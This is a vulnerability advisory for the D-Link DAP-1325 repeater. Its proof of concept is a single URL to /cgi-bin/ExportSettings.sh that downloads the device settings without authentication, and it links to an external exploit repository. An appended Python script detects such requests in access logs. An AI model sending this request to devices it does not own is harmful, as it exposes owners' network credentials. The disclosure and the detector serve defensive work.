Authored by ieduardogoncalves

D-Link DAP-1325 suffers from an insecure direct object reference vulnerability.

# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1
# Firmware version: 1.01
# Tested on: All Platforms


1) Description

The device is affected by a security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.


In my case, tested repeater IP: http://192.168.0.21/

Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0

2) Proof of Concept

Step 1: Go to the repeater login page: http://192.168.0.21/

Step 2: Add the payload to the URL.

Payload:
http://{ip}/cgi-bin/ExportSettings.sh

Payload:
https://github.com/eeduardogoncalves/exploit
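
A detection-side view of the request in Step 2, as an added example that is not part of the original advisory: it scans HTTP access logs for requests to the export endpoint and reports whether the settings file was actually served. The combined log format (as written by a proxy or network sensor in front of the repeater) and the sample lines are assumptions constructed for illustration.

```python
import re
from posixpath import normpath
from urllib.parse import unquote, urlsplit

EXPORT_PATH = "/cgi-bin/exportsettings.sh"  # endpoint from the advisory, lower-cased

# Assumed combined-log-format line from a proxy or sensor; the device's own
# logging is not described in the advisory.
LOG_RE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

SAMPLE_LOG = [  # constructed lines, not captured from a real device
    '192.168.0.50 - - [27/Jun/2023:10:01:12 +0000] "GET / HTTP/1.1" 200 5120',
    '192.168.0.77 - - [27/Jun/2023:10:02:40 +0000] "GET /cgi-bin/ExportSettings.sh HTTP/1.1" 200 18432',
    '192.168.0.77 - - [27/Jun/2023:10:03:05 +0000] "GET /cgi-bin/./%45xportSettings.sh?x=1 HTTP/1.1" 200 18432',
    '192.168.0.90 - - [27/Jun/2023:10:04:00 +0000] "GET /cgi-bin/exportsettings.sh HTTP/1.1" 401 -',
]

def normalise(target):
    """Reduce a request target to a canonical lower-case path."""
    path = target.split("?", 1)[0]
    if "://" in path:  # absolute-form target, as seen in forward-proxy logs
        path = urlsplit(path).path
    for _ in range(2):  # undo single and double percent-encoding
        path = unquote(path)
    return normpath("/" + path.lstrip("/")).lower()

def find_export_hits(lines):
    """Return (source, timestamp, verdict) for each request to the export endpoint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or normalise(m["target"]) != EXPORT_PATH:
            continue
        size = 0 if m["size"] == "-" else int(m["size"])
        # 200 with a body means the settings file left the device;
        # any other status means the request was refused or redirected.
        served = m["status"] == "200" and size > 0
        hits.append((m["src"], m["ts"], "served" if served else "blocked"))
    return hits

if __name__ == "__main__":
    for hit in find_export_hits(SAMPLE_LOG):
        print(hit)
```

A legitimate administrator export reaches the same path, so a "served" entry needs review only when the source is not a known management host.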